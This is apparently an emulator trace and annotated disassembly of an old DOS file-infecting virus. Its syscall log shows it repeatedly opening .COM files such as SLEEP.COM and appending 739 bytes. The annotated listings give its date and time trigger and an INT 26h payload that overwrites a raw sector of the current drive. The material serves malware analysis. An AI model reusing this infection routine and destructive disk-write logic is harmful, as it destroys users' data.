2018-12-25T12:02:07.892705036Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:07.899801154Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:07.9081049Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.911465402Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:07.917799272Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:07.924088404Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:07.926615089Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:07.929504844Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:07.937532728Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:07.939999575Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:07.946363968Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:07.954681512Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.966453414Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:07.973614236Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:07.979863195Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:07.982147865Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:07.985143843Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:07.993224093Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:07.995925727Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:08.002579362Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.010824928Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.022686699Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:08.029050504Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.035316659Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:08.037963946Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:08.040887846Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:08.049867016Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:08.052352124Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:08.059053261Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.067314038Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.071484837Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:08.078126916Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.084654629Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:08.086920651Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:08.089857766Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:08.098522347Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:08.100990873Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:08.107610752Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.116252386Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.119843127Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:08.126251208Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.132484976Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:08.134511748Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:08.137214346Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:08.144789562Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:08.146716588Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:08.153292733Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.163063339Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.166423116Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:08.173249248Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.175726566Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.178196166Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.180555295Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4
; Listing window from PC 0x14242, where the trace row above logs the return from
; INT 21h "Get date" (op 42 = AH 2Ah). DOS returns DH = month, DL = day; the row's
; own instruction, cmp dl, 4, tests the day of the month.
0x14245: jne 0x14251                ; day != 4: fall back to the time-of-day test
0x14247: cmp dh, 7                  ; month == 7 ?
0x1424a: jne 0x14251                ; not 4 July: fall back to the time-of-day test
0x1424c: xor ax, ax                 ; 4 July: ax = 0
0x1424e: jmp 0x1426f                ; target lies beyond the end of this window
0x14250: nop
0x14251: mov ah, 0x2c               ; AH = 2Ch: DOS Get time
0x14253: int 0x21                   ; returns CH = hour, CL = minute, DH = second, DL = 1/100 s
0x14255: or cl, cl                  ; minute == 0 ?
0x14257: jne 0x1427c                ; no: skip ahead to 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c                ; hour >= 6 (signed compare): skip ahead to 0x1427c
0x1425e: add cl, ch                 ; cl is 0 on this path, so cl = hour
0x14260: mov ax, cx                 ; ah = al = hour
; NOTE(review): a 1-byte opcode 98h in 16-bit code is cbw (ax = sign-extended al);
; the cwde mnemonic looks like a disassembler-mode artifact -- confirm.
0x14262: cwde
0x14263: add al, dh                 ; al += second
0x14265: adc al, dl                 ; al += 1/100 s + carry
0x14267: adc ah, 0                  ; propagate the carry into ah
0x1426a: or ax, ax                  ; sets ZF when ax == 0 (window ends here)
2018-12-25T12:02:08.18283672Z 44 PC: 14255 | Get time 0x14255: or cl, cl
; Listing window from PC 0x14255, where the trace row above logs the return from
; INT 21h "Get time" (op 44 = AH 2Ch). DOS returns CH = hour, CL = minute,
; DH = second, DL = 1/100 s; the row's own instruction, or cl, cl, tests the minute.
0x14257: jne 0x1427c                ; minute != 0: skip the disk write
0x14259: cmp ch, 6
0x1425c: jge 0x1427c                ; hour >= 6 (signed compare): skip the disk write
0x1425e: add cl, ch                 ; cl is 0 on this path, so cl = hour
0x14260: mov ax, cx                 ; ah = al = hour
; NOTE(review): a 1-byte opcode 98h in 16-bit code is cbw (ax = sign-extended al);
; the cwde mnemonic looks like a disassembler-mode artifact -- confirm.
0x14262: cwde
0x14263: add al, dh                 ; al += second
0x14265: adc al, dl                 ; al += 1/100 s + carry
0x14267: adc ah, 0                  ; propagate the carry into ah
0x1426a: or ax, ax
0x1426c: jne 0x1426f                ; ax != 0: use it as is
0x1426e: inc ax                     ; ax == 0: force it to 1
0x1426f: mov dx, ax                 ; DX = first logical sector (0x1426f is also the target of the jmp at 0x1424e in the Get date listing)
0x14271: mov cx, 1                  ; CX = 1 sector
0x14274: xor bx, bx                 ; BX = 0: data is taken from DS:0000
0x14276: mov ah, 0x19               ; AH = 19h: DOS Get default drive
0x14278: int 0x21                   ; returns AL = current drive (0 = A:)
; Defender note: INT 26h is the DOS absolute disk write (AL = drive, CX = count,
; DX = first sector, DS:BX = data). It overwrites one raw sector of the current
; drive, bypassing the file system; the sector number comes from the clock sum above.
0x1427a: int 0x26
0x1427c: mov bx, 0x31a              ; target of both skips above (window ends here)
2018-12-25T12:02:08.186471021Z 44 PC: 14283 | Get time 0x14283: inc dh
; Listing window from PC 0x14283, where the trace row above logs the return from
; another INT 21h "Get time" (DH = second). The row's own instruction, inc dh,
; leaves dh = second + 1.
0x14285: cmp dh, byte ptr [0x319]   ; byte at DS:0x319 -- presumably the number of table entries; confirm
0x14289: jl 0x14291                 ; dh < [0x319]: use dh as the index
0x1428b: sub dh, byte ptr [0x319]   ; otherwise subtract and retest (modulo by repeated subtraction)
0x1428f: jmp 0x14285
0x14291: mov al, dh
0x14293: mov cl, al
; NOTE(review): a 1-byte opcode 98h in 16-bit code is cbw (ax = sign-extended al);
; the cwde mnemonic looks like a disassembler-mode artifact -- confirm.
0x14295: cwde
0x14296: shl ax, 1                  ; index * 2: entries are words
; NOTE(review): bx is presumably still 0x31a from the mov bx, 0x31a at 0x1427c;
; the instructions between 0x1427c and 0x14283 are not in this window.
0x14298: add bx, ax                 ; bx = address of the selected entry
0x1429a: mov si, word ptr [bx]      ; si = pointer stored in that entry
0x1429c: mov ch, byte ptr [si - 1]  ; ch = byte stored just before the pointed-to data
0x1429f: mov dx, si
0x142a1: mov ah, 9                  ; AH = 09h: DOS print '$'-terminated string at DS:DX
0x142a3: int 0x21
0x142a5: cmp ch, 0
0x142a8: jne 0x142ac
0x142aa: int 0x20                   ; ch == 0: terminate the program
0x142ac: cmp ch, 1
0x142af: jne 0x142b2                ; handling of other ch values is outside this window

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":7614,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:08.10764358Z 26 PC: 14146 | Set disk transfer address
2018-12-25T12:02:08.10930192Z 78 PC: 1419c | Find first file
2018-12-25T12:02:08.114050113Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:08.130788051Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:02:08.139632924Z 66 PC: 141ce | Move file pointer
2018-12-25T12:02:08.141429654Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:02:08.150054176Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:02:08.163184061Z 66 PC: 141f6 | Move file pointer
2018-12-25T12:02:08.167281508Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:02:08.171427753Z 62 PC: 14190 | Close file
2018-12-25T12:02:08.275817495Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.279922669Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:08.28677651Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.293411623Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:08.295941909Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:08.29850971Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:08.440152121Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:08.442501909Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:08.501851376Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.510170851Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.512859399Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:08.519448356Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.526366791Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:08.528128103Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:08.531604705Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:08.539318946Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:08.541048445Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:08.547878691Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.555994248Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.558373845Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:08.565136353Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.571553498Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:08.572737075Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:08.57655093Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:08.584606251Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:08.585779621Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:08.592968421Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.601057633Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.603804591Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:08.610595516Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.618728339Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:08.620088695Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:08.623142135Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:08.631128644Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:08.63241002Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:08.639746541Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.647575412Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.65037823Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:08.656951816Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.664569546Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:08.665880022Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:08.669213421Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:08.678052995Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:08.679354323Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:08.685678073Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.694212161Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.696821131Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:08.704147167Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.711120011Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:08.713167446Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:08.717002319Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:08.725284858Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:08.726908033Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:08.734412923Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.742609818Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.744277244Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:08.748952602Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.750663886Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.751762053Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.75448746Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4
; Listing window from PC 0x14242, where the trace row above logs the return from
; INT 21h "Get date" (op 42 = AH 2Ah). DOS returns DH = month, DL = day; the row's
; own instruction, cmp dl, 4, tests the day of the month.
0x14245: jne 0x14251                ; day != 4: fall back to the time-of-day test
0x14247: cmp dh, 7                  ; month == 7 ?
0x1424a: jne 0x14251                ; not 4 July: fall back to the time-of-day test
0x1424c: xor ax, ax                 ; 4 July: ax = 0
0x1424e: jmp 0x1426f                ; target lies beyond the end of this window
0x14250: nop
0x14251: mov ah, 0x2c               ; AH = 2Ch: DOS Get time
0x14253: int 0x21                   ; returns CH = hour, CL = minute, DH = second, DL = 1/100 s
0x14255: or cl, cl                  ; minute == 0 ?
0x14257: jne 0x1427c                ; no: skip ahead to 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c                ; hour >= 6 (signed compare): skip ahead to 0x1427c
0x1425e: add cl, ch                 ; cl is 0 on this path, so cl = hour
0x14260: mov ax, cx                 ; ah = al = hour
; NOTE(review): a 1-byte opcode 98h in 16-bit code is cbw (ax = sign-extended al);
; the cwde mnemonic looks like a disassembler-mode artifact -- confirm.
0x14262: cwde
0x14263: add al, dh                 ; al += second
0x14265: adc al, dl                 ; al += 1/100 s + carry
0x14267: adc ah, 0                  ; propagate the carry into ah
0x1426a: or ax, ax                  ; sets ZF when ax == 0 (window ends here)
2018-12-25T12:02:08.756562861Z 44 PC: 14255 | Get time 0x14255: or cl, cl
; Listing window from PC 0x14255, where the trace row above logs the return from
; INT 21h "Get time" (op 44 = AH 2Ch). DOS returns CH = hour, CL = minute,
; DH = second, DL = 1/100 s; the row's own instruction, or cl, cl, tests the minute.
0x14257: jne 0x1427c                ; minute != 0: skip the disk write
0x14259: cmp ch, 6
0x1425c: jge 0x1427c                ; hour >= 6 (signed compare): skip the disk write
0x1425e: add cl, ch                 ; cl is 0 on this path, so cl = hour
0x14260: mov ax, cx                 ; ah = al = hour
; NOTE(review): a 1-byte opcode 98h in 16-bit code is cbw (ax = sign-extended al);
; the cwde mnemonic looks like a disassembler-mode artifact -- confirm.
0x14262: cwde
0x14263: add al, dh                 ; al += second
0x14265: adc al, dl                 ; al += 1/100 s + carry
0x14267: adc ah, 0                  ; propagate the carry into ah
0x1426a: or ax, ax
0x1426c: jne 0x1426f                ; ax != 0: use it as is
0x1426e: inc ax                     ; ax == 0: force it to 1
0x1426f: mov dx, ax                 ; DX = first logical sector (0x1426f is also the target of the jmp at 0x1424e in the Get date listing)
0x14271: mov cx, 1                  ; CX = 1 sector
0x14274: xor bx, bx                 ; BX = 0: data is taken from DS:0000
0x14276: mov ah, 0x19               ; AH = 19h: DOS Get default drive
0x14278: int 0x21                   ; returns AL = current drive (0 = A:)
; Defender note: INT 26h is the DOS absolute disk write (AL = drive, CX = count,
; DX = first sector, DS:BX = data). It overwrites one raw sector of the current
; drive, bypassing the file system; the sector number comes from the clock sum above.
0x1427a: int 0x26
0x1427c: mov bx, 0x31a              ; target of both skips above (window ends here)
2018-12-25T12:02:08.758503976Z 44 PC: 14283 | Get time 0x14283: inc dh
; Listing window from PC 0x14283, where the trace row above logs the return from
; another INT 21h "Get time" (DH = second). The row's own instruction, inc dh,
; leaves dh = second + 1.
0x14285: cmp dh, byte ptr [0x319]   ; byte at DS:0x319 -- presumably the number of table entries; confirm
0x14289: jl 0x14291                 ; dh < [0x319]: use dh as the index
0x1428b: sub dh, byte ptr [0x319]   ; otherwise subtract and retest (modulo by repeated subtraction)
0x1428f: jmp 0x14285
0x14291: mov al, dh
0x14293: mov cl, al
; NOTE(review): a 1-byte opcode 98h in 16-bit code is cbw (ax = sign-extended al);
; the cwde mnemonic looks like a disassembler-mode artifact -- confirm.
0x14295: cwde
0x14296: shl ax, 1                  ; index * 2: entries are words
; NOTE(review): bx is presumably still 0x31a from the mov bx, 0x31a at 0x1427c;
; the instructions between 0x1427c and 0x14283 are not in this window.
0x14298: add bx, ax                 ; bx = address of the selected entry
0x1429a: mov si, word ptr [bx]      ; si = pointer stored in that entry
0x1429c: mov ch, byte ptr [si - 1]  ; ch = byte stored just before the pointed-to data
0x1429f: mov dx, si
0x142a1: mov ah, 9                  ; AH = 09h: DOS print '$'-terminated string at DS:DX
0x142a3: int 0x21
0x142a5: cmp ch, 0
0x142a8: jne 0x142ac
0x142aa: int 0x20                   ; ch == 0: terminate the program
0x142ac: cmp ch, 1
0x142af: jne 0x142b2                ; handling of other ch values is outside this window